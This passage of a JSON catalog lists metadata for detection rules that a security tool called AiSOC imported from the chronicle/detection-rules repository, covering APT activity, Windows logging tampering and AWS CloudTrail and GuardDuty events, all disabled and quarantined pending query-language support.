"apt_user_agent", "description": "apt_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/apt_user_agent.yaral" } }, { "id": "chronicle-detection-rules-apt10-behavior", "type": "detection", "name": "apt10_behavior", "description": "apt10_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt10-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt10_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/apt10_behavior.yaral" } }, { "id": "chronicle-detection-rules-apt28-zekapab-zebrocy-implant-sysmon-firewall-proxy", "type": "detection", "name": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "description": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt28-zekapab-zebrocy-implant-sysmon-firewall-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/apt28_zekapab_zebrocy_implant__sysmon_firewall_proxy.yaral" } }, { "id": "chronicle-detection-rules-apt28-zekapabzebrocycannon-implant-sysmonfirewallproxy-part2", "type": "detection", "name": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "description": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt28-zekapabzebrocycannon-implant-sysmonfirewallproxy-part2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt28_zekapabzebrocycannon_implant_sysmonfirewallproxy_part2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/apt28_zekapab_zebrocy_cannon_implant__sysmon_firewall_proxy___part_2.yaral" } }, { "id": "chronicle-detection-rules-apt29", "type": "detection", "name": "apt29", "description": "apt29", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt29.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt29", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/apt29_part_1.yaral" } }, { "id": "chronicle-detection-rules-apt29-part-1", "type": "detection", "name": "apt29_part_1", "description": "apt29_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt29-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt29_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/apt29_part_2.yaral" } }, { "id": "chronicle-detection-rules-apt33-remcos-sysmon-behavior-historic-indicators", "type": "detection", "name": "apt33_remcos_sysmon_behavior_historic_indicators", "description": "apt33_remcos_sysmon_behavior_historic_indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt33-remcos-sysmon-behavior-historic-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt33_remcos_sysmon_behavior_historic_indicators", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/apt33_remcos__sysmon_behavior___historic_indicators.yaral" } }, { "id": "chronicle-detection-rules-apt40-dropbox-tool-user-agent", "type": "detection", "name": "apt40_dropbox_tool_user_agent", "description": "apt40_dropbox_tool_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/apt40-dropbox-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "apt40_dropbox_tool_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/apt40_dropbox_tool_user_agent.yaral" } }, { "id": "chronicle-detection-rules-atlassian-confluence-download-attachments-remote-code-executiondirectory-travers", "type": "detection", "name": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "description": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/atlassian-confluence-download-attachments-remote-code-executiondirectory-travers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "atlassian_confluence_download_attachments_remote_code_executiondirectory_traversal", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/proxy/atlassian_confluence_download_attachments_remote_code_execution_directory_traversal.yaral" } }, { "id": "chronicle-detection-rules-attempt-to-disable-windows-events-logging-via-registry", "type": "detection", "name": "attempt_to_disable_windows_events_logging_via_registry", "description": "attempt_to_disable_windows_events_logging_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/attempt-to-disable-windows-events-logging-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "attempt_to_disable_windows_events_logging_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/attempt_to_disable_windows_events_logging__via_registry.yaral" } }, { "id": "chronicle-detection-rules-attempts-to-stop-windows-defender-and-windows-updates", "type": "detection", "name": "attempts_to_stop_windows_defender_and_windows_updates", "description": "attempts_to_stop_windows_defender_and_windows_updates", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/attempts-to-stop-windows-defender-and-windows-updates.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "attempts_to_stop_windows_defender_and_windows_updates", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/attempts_to_stop_windows_defender_and_windows_updates.yaral" } }, { "id": "chronicle-detection-rules-avg-antivirus-avast-antivirus-dll-search-order-hijacking-and-potential-abuses", "type": "detection", "name": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "description": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/avg-antivirus-avast-antivirus-dll-search-order-hijacking-and-potential-abuses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "avg_antivirus__avast_antivirus_dll_search_order_hijacking_and_potential_abuses", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/avg_antivirus___avast_antivirus_dll_search_order_hijacking_and_potential_abuses.yaral" } }, { "id": "chronicle-detection-rules-aws-account-leaving-or-removed-from-organization", "type": "detection", "name": "aws_account_leaving_or_removed_from_organization", "description": "aws_account_leaving_or_removed_from_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-account-leaving-or-removed-from-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_account_leaving_or_removed_from_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_account_leaving_or_removed_from_organization.yaral" } }, { "id": "chronicle-detection-rules-aws-alb-insecure-ssl-policy", "type": "detection", "name": "aws_alb_insecure_ssl_policy", "description": "aws_alb_insecure_ssl_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-alb-insecure-ssl-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_alb_insecure_ssl_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_alb_insecure_ssl_policy.yaral" } }, { "id": "chronicle-detection-rules-aws-api-call-outside-of-organization", "type": "detection", "name": "aws_api_call_outside_of_organization", "description": "aws_api_call_outside_of_organization", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-api-call-outside-of-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_api_call_outside_of_organization", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_api_call_outside_of_organization.yaral" } }, { "id": "chronicle-detection-rules-aws-api-gateway-get-keys", "type": "detection", "name": "aws_api_gateway_get_keys", "description": "aws_api_gateway_get_keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-api-gateway-get-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_api_gateway_get_keys", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_api_gateway_get_keys.yaral" } }, { "id": "chronicle-detection-rules-aws-backup-plan-deleted", "type": "detection", "name": "aws_backup_plan_deleted", "description": "aws_backup_plan_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-backup-plan-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_backup_plan_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_backup_plan_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-cloudfront-insecure-ssl-policy", "type": "detection", "name": "aws_cloudfront_insecure_ssl_policy", "description": "aws_cloudfront_insecure_ssl_policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-cloudfront-insecure-ssl-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_cloudfront_insecure_ssl_policy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_cloudfront_insecure_ssl_policy.yaral" } }, { "id": "chronicle-detection-rules-aws-cloudtrail-logging-tampered", "type": "detection", "name": "aws_cloudtrail_logging_tampered", "description": "aws_cloudtrail_logging_tampered", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-cloudtrail-logging-tampered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_cloudtrail_logging_tampered", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_cloudtrail_logging_tampered.yaral" } }, { "id": "chronicle-detection-rules-aws-config-service-modified", "type": "detection", "name": "aws_config_service_modified", "description": "aws_config_service_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-config-service-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_config_service_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_config_service_modified.yaral" } }, { "id": "chronicle-detection-rules-aws-console-login-without-mfa", "type": "detection", "name": "aws_console_login_without_mfa", "description": "aws_console_login_without_mfa", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-console-login-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_console_login_without_mfa", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_console_login_without_mfa.yaral" } }, { "id": "chronicle-detection-rules-aws-delete-cloudwatch-log-group", "type": "detection", "name": "aws_delete_cloudwatch_log_group", "description": "aws_delete_cloudwatch_log_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_delete_cloudwatch_log_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_delete_cloudwatch_log_group.yaral" } }, { "id": "chronicle-detection-rules-aws-delete-vpc-flow-logs", "type": "detection", "name": "aws_delete_vpc_flow_logs", "description": "aws_delete_vpc_flow_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-delete-vpc-flow-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_delete_vpc_flow_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_delete_vpc_flow_logs.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-ami-or-snapshot-shared-publicly", "type": "detection", "name": "aws_ec2_ami_or_snapshot_shared_publicly", "description": "aws_ec2_ami_or_snapshot_shared_publicly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-ami-or-snapshot-shared-publicly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_ami_or_snapshot_shared_publicly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_ami_or_snapshot_shared_publicly.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-get-windows-admin-password", "type": "detection", "name": "aws_ec2_get_windows_admin_password", "description": "aws_ec2_get_windows_admin_password", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-get-windows-admin-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_get_windows_admin_password", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_get_windows_admin_password.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-high-number-of-api-calls", "type": "detection", "name": "aws_ec2_high_number_of_api_calls", "description": "aws_ec2_high_number_of_api_calls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-high-number-of-api-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_high_number_of_api_calls", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_high_number_of_api_calls.yaral" } }, { "id": "chronicle-detection-rules-aws-ec2-user-data-modified", "type": "detection", "name": "aws_ec2_user_data_modified", "description": "aws_ec2_user_data_modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ec2-user-data-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ec2_user_data_modified", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ec2_user_data_modified.yaral" } }, { "id": "chronicle-detection-rules-aws-enable-disable-region", "type": "detection", "name": "aws_enable_disable_region", "description": "aws_enable_disable_region", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-enable-disable-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_enable_disable_region", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_enable_disable_region.yaral" } }, { "id": "chronicle-detection-rules-aws-excessive-successful-discovery-events", "type": "detection", "name": "aws_excessive_successful_discovery_events", "description": "aws_excessive_successful_discovery_events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-excessive-successful-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_excessive_successful_discovery_events", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_excessive_successful_discovery_events.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-black-hole-traffic-detected", "type": "detection", "name": "aws_guardduty_black_hole_traffic_detected", "description": "aws_guardduty_black_hole_traffic_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-black-hole-traffic-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_black_hole_traffic_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_black_hole_traffic_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-brute-force-activity-detected", "type": "detection", "name": "aws_guardduty_brute_force_activity_detected", "description": "aws_guardduty_brute_force_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-brute-force-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_brute_force_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_brute_force_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-command-and-control-activity-detected", "type": "detection", "name": "aws_guardduty_command_and_control_activity_detected", "description": "aws_guardduty_command_and_control_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-command-and-control-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_command_and_control_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_command_and_control_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-crypto-currency-activity-detected", "type": "detection", "name": "aws_guardduty_crypto_currency_activity_detected", "description": "aws_guardduty_crypto_currency_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-crypto-currency-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_crypto_currency_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_crypto_currency_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-denial-of-service-activity-detected", "type": "detection", "name": "aws_guardduty_denial_of_service_activity_detected", "description": "aws_guardduty_denial_of_service_activity_detected", "version": "1.0.0", 